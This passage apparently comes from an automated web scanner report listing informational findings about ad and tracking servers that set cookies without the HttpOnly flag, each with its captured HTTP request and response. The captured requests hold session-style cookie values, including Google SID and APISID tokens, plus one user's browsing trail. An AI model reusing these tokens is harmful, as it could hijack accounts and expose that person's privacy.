document.writeln("<script type=\"text/javascript\">\nvar pubId=26620;\nvar siteId=26621;\nvar kadId=21556;\nvar kadwidth=300;\nvar kadheight=250;\nvar kadNetwork=6;\nvar kadtype=1;\n<\/script>\n<scrip
...[SNIP]...
14.105. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/ad?AdBoxType=15&url=virgin.dr.dfa&inv=doubleclick&rnd=1317602293772&esc=0&CustomQuery=eaid%3D245735545%26epid%3D70101326%26esid%3D1128332%26ecid%3D43398155%26ebuy%3D5794457%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://s0.2mdn.net/3268620/PID_1701515_parent_virgin_728.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317601703104_282600831_ap3104_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|; p270r=b$u-7#A.8Qp|i-1401516#1.8Qp|i-1643195#1.8Qp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1317602404442_239271924_as3101_imp|194#1317602404442_239271924_as3101_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Set-Cookie: p194r=b$u-98#5.8Qp|i-tracking#..2.8Qp.2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:40:03 GMT
Content-Length: 2204

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1317602404442_239271924_as3101_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1317602404442_239271924_as3
...[SNIP]...
14.106. http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d928398/20/44069375/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d928398/20/44069375/decide.php?ord=1317600550 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_928398-C|@~M-0_873769-]|@~M-0; LP=1317596202

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:01 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: CS1=deleted; expires=Sun, 03 Oct 2010 00:10:00 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_928398-1-3; expires=Thu, 22 Nov 2012 16:10:01 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_873769-]|@~M-0_928398-C|@~M-Vp; expires=Thu, 22-Nov-2012 16:10:01 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
14.107. http://api.wipmania.com/jsonp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.wipmania.com
Path:   /jsonp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsonp?callback=jsonp1317602099165&_=1317602106541 HTTP/1.1
Host: api.wipmania.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:35:09 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: application/javascript; charset=utf-8
Set-Cookie: uid=xw/qB06JAz2HWy4DCzpOAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.wipmania.com; path=/
Content-Length: 157

jsonp1317602099165({"latitude":"44.9718","longitude":"-113.3405","zoom":3,"address":{"city":"-","country":"United States","country_code":"US","region":"-"}})
14.108. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjXmxcb1SChjECiXSjEaqO-DnawkdCeNdpQ1eq5H7VQaB1TYoVNaHivfCOnRdR3nNOQ08CAf6CRApbTves9jTDvA3EsEz817LyYCYCbZsTHriQICDzjjFZGK6LqC9xB10_TSh1omi0Cz3S6WTEQKI4YWzinp7wd_vo_RGZ0Q7Pmh8a7ryXTtM1Q9zJgPjGhZAWlQtcmVUtvW6l7weDo9XnzQ4xsrHMoS73ySwvooWqNnqucKMrgZgH8M9keX_Pz9mAcFTAqTRl1KdCO3svISfz05dJpITuMlwLigsrRt_DeV0

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c;Domain=.google.com;Path=/;Expires=Thu, 30-Sep-2021 00:09:20 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 03 Oct 2011 00:09:20 GMT
Date: Mon, 03 Oct 2011 00:09:20 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5319

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23980661-3686120e';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...
14.109. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1317599974.004,wait-%3E10000,&1317599980689 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_G=method->-1,ts->1317599953; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:01:20 GMT
Content-Type: image/gif
Connection: close
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;
14.110. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=2&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:22 2011&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26670

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
14.111. http://as.chango.com/links/adunit/1.31759988192e+12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "01bddffbb814f8450036212edceb90ccd4fe74e8"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2369
Date: Sun, 02 Oct 2011 23:58:03 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:02 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:02 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript">(new Image()).src = 'http://cm.g.doubleclick.net/pixel?nid=chango&partnerId=&referrerURL=&token=b6ae8
...[SNIP]...
14.112. http://as00.estara.com/fs/ruleaction.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /fs/ruleaction.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fs/ruleaction.php?accountid=200106297609&urid=79044&cookieurid=&estara_fsguid=5860EEFA281121EC93852AEC182A3278&dnc=1317600784907704486 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsserver__SESSION__=t-501.estara.com; fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEGFjLke6WJJNAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh98VLi0sK2lwYkF9cKjWXdEJSUbAVeUEmfbt9bc9z23--XB-7XiPa.b5v54oJuYNDTOS.bh.3a4Upc7bIKnpkFS4SWEdkFT0SOHgSjEhAsfc4xMhhn8PeTTwRI6yQqJNDDJI9yUb6oGKAvA.gPCGWjs5j3KkNQOUkiGRTzBGXFJFaIV3UC3CJhL2QLgYRT8QT9UQ9IU9okAwqRqropLRo5FRhpLRikF00kkCCuR2ik-JJj0qrGAQ9QSMkOY2CmnIMxndUDsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmG6IkxXhKmw4AsTjODqqGrkMYjL25VnOrHu.Q8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:14 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Pragma: no-cache
Set-Cookie: fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8oZYOjqPcac2AJWTIJJNMUdcUkRqhXRRD8AlEvZCuhhEPBFP1BP1hDyhQTKoGKmik9KikVOFkdKKQXbRSAIJ5naITsqVHpVWMQh6gkZIchoFNeUYjHtUNsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmE6IkxHhKmw4AsTjODqqGrkMYjL25VnOjF1N6J8tFX0Dw__; expires=Sat, 01-Oct-2016 00:13:14 GMT; path=/; domain=.estara.com
Content-Length: 8
Content-Type: text/html; charset=UTF-8

if(0){}
14.113. http://as00.estara.com/fs/rules.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /fs/rules.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs/rules.php?accountid=200106297609&title=Priceline.com%20-%20hotel%2C%20hotel%20reservation%2C%20cheap%20hotel%2C%20las%20vegas%20hotel%2C%20boston%20hotel%2C%20hotel%20deal%2C%20ne&referrer=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchHotels.do%3Fsession_key%3D711510AC721510AC20111003000909914181269334%26plf%3Dpcln%26INIT_SESSION%3Dtrue%26RefID%3DPLIGOUGO%26RefClickID%3DHOTELSEARCH&w=1920&h=1200&d=16&platform=Win32&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.187%20Safari%2F535.1&cs=ISO-8859-1&estara_fsguid=5860EEFA281121EC93852AEC182A3278&estara_firsttime=1317600765&location=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchResults.do%3Fjsk%3D5463010a5064010a2011100300091519d011589950%26key%3Dgtapcnq5%26showDP%3Dy%26NYOPRedirNI%3Dnull&dnc=1317600769877566774 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XY5LDoMwDERvw67InzjEC85SQYtEF9CqpPevCIlJ69WM33hkAkDwpCokPTKKkIbgmmGM0xapotf3sN7Xz9J716KCei3DTc4FAcktDMh-LYlaS2iRxAnYdNwgk1zmR9z6rJ.vad21dGj7Xee9YEAu4DA-ZBnibZ4SDMpqyWRKMpkqCSxnMpmSBPY18UacR2d-HOa84fqG6zZXE2eEBQIVcpiTaE20kC8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:59 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Cache-Control: private, max-age=2592000
Set-Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; expires=Sat, 01-Oct-2016 00:13:59 GMT; path=/; domain=.estara.com
Set-Cookie: fscookies=b64_XZNNUsMwDIVvkx0d-drWomdhCnSmLFoYCPfHcWxZaTbx8yc9R5JDAAiJzJT0jIyqZKXIcnlbr78rBfr6c3l8PP7u5yQnNLBk4.GlxxUF7S4MyE8ujbpLOSGpKPiTeUEmfbl9rr-nvv76vj62tWb0-W3d9xUL8gC7OJD7ZX2-XRssxuaRTYzIJkIksM7IJkYkcIokOZGE4t.xi5nDMYejm0QiTlih0CC7mMQiMSdjUDmBbQOobyhsT2PcqA9A5SSI5FO0jEvJSL0Q6qIdQEsmHIUMMYlEIpFoJBoJRUKTGKg4aWKQ2qKZ04ST2opJNtFJAUnutotB6pWelTYxCUaCTkiszIK6CgzmPaob9U8q6sG7GsFVJY3BNZsOzhSdc3l2zgfnfHDW6FxbKLGf4h1AxDRH2pXbpMMR6XBEOhSWYmGCGUIdTc08Bgl5m4pMD0zDjagfPSrCfw__; expires=Sat, 01-Oct-2016 00:13:59 GMT; path=/; domain=.estara.com
Expires: Wed, 02 Nov 2011 00:13:59 GMT
Content-Length: 26084
Content-Type: text/javascript; charset=UTF-8

eStara_obscuration['87123']='bookCreditCardNumber';eStara_obscuration['72139']='offer(.*)CREDIT_CARD_NUM|offer(.*)credit_card|offer(.*)CREDIT_CARD_NUM(.*)';eStara_obscuration['72149']='offer(.*)EXPIRA
...[SNIP]...
14.114. http://asset.userfly.com/users/20826/userfly.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asset.userfly.com
Path:   /users/20826/userfly.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users/20826/userfly.js HTTP/1.1
Host: asset.userfly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/map.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 3
Cache-Control: max-age=3600, private, max-stale=3600
Set-Cookie: capture_guid=9c784e4c-ed53-11e0-ab0a-12313b03145d; domain=userfly.com; path=/
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

14.115. http://ats.tumri.net/ats/ats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ats.tumri.net
Path:   /ats/ats

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ats/ats?cmd=RT&AdvertiserID=3052&platform=T&ActionID=17&ActionName=RTALL&ut1=HOTEL;&ut2=&ut3=BOS&ut4=&ut5=US&cachebuster=1230846595 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
